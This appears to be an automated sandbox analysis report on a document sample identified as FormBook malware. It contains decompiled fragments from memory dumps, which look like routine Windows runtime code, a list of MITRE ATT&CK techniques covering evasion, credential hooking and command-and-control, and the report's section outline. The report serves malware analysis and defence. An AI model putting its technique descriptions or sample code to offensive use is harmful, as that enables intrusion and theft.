							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E01E63F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x1ef20c0;
								if(_t85 != 0x1ef20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E01E9217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E01E63F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x01e3ec56
0x01e3ec56
0x01e3ec56
0x01e3ec5c
0x01e3ec64
0x01e723e6
0x01e723eb
0x01e723eb
0x01e3ec6a
0x01e3ec6c
0x01e3ec6f
0x01e723f3
0x01e723f8
0x01e723fa
0x01e723fc
0x01e3ec75
0x01e3ec76
0x01e3ec76
0x01e3ec7b
0x01e3ec7c
0x01e3ec7e
0x01e72406
0x01e72407
0x01e7240c
0x01e7240d
0x01e7240d
0x01e7240d
0x01e72414
0x01e72417
0x01e7241e
0x01e72435
0x01e72438
0x01e7243c
0x01e7243f
0x01e72442
0x01e72443
0x01e72446
0x01e72449
0x01e72453
0x01e72455
0x01e7245b
0x01e7245b
0x01e3eb99
0x01e3eb99
0x01e3eb9c
0x01e3eb9d
0x01e3eb9f
0x01e3eba2
0x01e72465
0x01e7246b
0x01e7246d
0x01e3eba8
0x01e3eba9
0x01e3eba9
0x01e3ebae
0x01e3ebb3
0x01e3ebb9
0x01e3ebbb
0x01e72513
0x01e72514
0x01e72519
0x01e7251b
0x01e3ec2a
0x01e3ec2d
0x01e3ec33
0x01e3ec36
0x01e3ec3a
0x01e3ec3e
0x01e3ec40
0x01e3ec47
0x01e3ec47
0x01e3ec40
0x01e122c6
0x01e3ebc1
0x01e3ebc1
0x01e3ebc5
0x01e3ec9a
0x01e3ec9a
0x01e3ebd6
0x01e3ebd6
0x00000000
0x01e3ebbb
0x01e72477
0x01e7247c
0x01e72486
0x01e7248b
0x01e72496
0x01e7249b
0x01e7249d
0x01e724a0
0x01e724a3
0x01e724aa
0x01e724aa
0x01e724a5
0x01e724a5
0x01e724a5
0x01e724ac
0x01e724af
0x01e724b0
0x01e724b3
0x01e724b9
0x01e724ba
0x01e724bb
0x01e724c6
0x01e724cb
0x01e724cd
0x01e724d0
0x01e724d1
0x01e724d4
0x01e724d6
0x01e724d9
0x01e724d9
0x01e724dc
0x01e724df
0x01e724e1
0x01e724e7
0x01e724e9
0x01e724ec
0x01e724ef
0x01e724f2
0x01e724f2
0x01e724ef
0x01e724e7
0x01e724fa
0x01e724ff
0x01e72501
0x01e72503
0x01e72506
0x01e7250b
0x01e3eb8c
0x01e3eb93
0x00000000
0x00000000
0x01e3eb93
0x00000000
0x01e3eb99
0x01e3ec85
0x01e3ec85
0x01e3ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 01E724FA
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01E724BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01E7248D

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: e5cc99d00d00905b9c63380ece3f48979cacdc6ae83b4dac8ec3ec23d8bcfec3
Instruction ID: 3bd794429224fd522cd6a7c3b6f97f6353cb4d7e5ab93583d56296b2feb1e755
Opcode Fuzzy Hash: e5cc99d00d00905b9c63380ece3f48979cacdc6ae83b4dac8ec3ec23d8bcfec3
Instruction Fuzzy Hash: 5C41B9B0600246ABDB24DB68CC89FAE77B9FF84710F149605F7559B2C0D735E941C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01E4FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01E4FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E01E4EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E01E4EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E01E4685D(_t167, 4) == 0) {
								if(E01E4685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E01E4685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E01E4685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E01E28980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E01E1DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E01E4EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E01E4EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x01e4fcd1
0x01e4fcd6
0x01e4fcd9
0x01e4fcdc
0x01e4fcdf
0x01e4fce2
0x01e4fce5
0x01e4fce8
0x01e4fceb
0x01e4fced
0x01e4fced
0x01e4fcf3
0x00000000
0x00000000
0x01e4fcfc
0x01e4fcfe
0x01e4fdc1
0x01e7ecbd
0x00000000
0x01e7eccc
0x01e7eccc
0x01e7ecd2
0x00000000
0x00000000
0x01e7ecdf
0x01e7ece0
0x01e7ece4
0x01e7eceb
0x01e7ecee
0x01e7eca8
0x01e7eca8
0x01e7ecaa
0x01e4fd76
0x01e4fd79
0x01e4fdb4
0x01e4fdb5
0x01e4fdb6
0x00000000
0x01e4fdb6
0x01e4fd7e
0x01e7ecfc
0x01e4fe2f
0x00000000
0x01e4fe2f
0x01e7ed08
0x01e7ed0f
0x01e7ed17
0x01e7ed1b
0x00000000
0x01e7ed1b
0x01e4fd88
0x00000000
0x00000000
0x01e4fd94
0x01e4fd99
0x01e4fda1
0x00000000
0x00000000
0x01e4fdb0
0x00000000
0x01e4fdb0
0x01e7ecbd
0x01e4fdc7
0x01e4fdcb
0x00000000
0x01e4fdd7
0x01e4fde3
0x01e4fe06
0x01e61fe7
0x00000000
0x00000000
0x01e61fef
0x01e61ff0
0x01e61ff4
0x01e61ff7
0x01e61ffa
0x01e61ffd
0x01e62000
0x00000000
0x00000000
0x01e7ecf1
0x00000000
0x01e7ecf1
0x00000000
0x01e4fe06
0x01e4fde8
0x01e4fdec
0x01e4fdef
0x01e4fdf2
0x00000000
0x01e4fdf2
0x01e4fdcb
0x01e4fd04
0x01e4fd05
0x01e7ec67
0x00000000
0x00000000
0x01e7ec6f
0x00000000
0x01e7ec6f
0x01e4fd13
0x01e4fd3c
0x01e4fd40
0x01e7ec75
0x01e7ec7a
0x00000000
0x01e7ec8a
0x01e7ec8a
0x01e7ec90
0x01e7ecb2
0x01e4fd73
0x01e4fd73
0x00000000
0x01e4fd73
0x01e7ec95
0x00000000
0x00000000
0x01e7eca1
0x01e7eca4
0x01e7eca5
0x00000000
0x01e7eca5
0x01e7ec7a
0x01e4fd4a
0x00000000
0x01e4fd6e
0x01e4fd6e
0x01e4fd71
0x00000000
0x01e4fd71
0x01e4fd4a
0x01e4fd21
0x01e5a3a1
0x00000000
0x01e5a3a1
0x01e4fd36
0x01e6200b
0x01e62012
0x00000000
0x00000000
0x01e62018
0x00000000
0x01e62018
0x00000000
0x01e4fd36
0x01e4fe0f
0x01e4fe16
0x01e5a3ad
0x00000000
0x00000000
0x01e5a3b3
0x01e5a3b3
0x01e4fe1f
0x01e7ed25
0x01e7ed86
0x00000000
0x00000000
0x01e7ed91
0x01e7ed95
0x01e7ed95
0x01e7ed9a
0x01e7edad
0x01e7edb3
0x01e7edba
0x01e7edc4
0x01e7edc9
0x00000000
0x01e7edcc
0x01e7ed2a
0x01e7ed55
0x00000000
0x00000000
0x01e7ed61
0x01e7ed66
0x01e7ed6e
0x00000000
0x00000000
0x01e7ed7d
0x00000000
0x01e7ed7d
0x01e7ed30
0x00000000
0x00000000
0x01e7ed3c
0x01e7ed43
0x01e7ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 01E4FD94

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 48324bfc720df47dcd9dbb4b7b2a63338ec553be6ebd1ef2781a575ec8422511
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 9991A031D0025AEFEF24CF6CD8457EEBBB4FF45B19F20A06AE551A6252E7304A41CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report IMG-11862.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre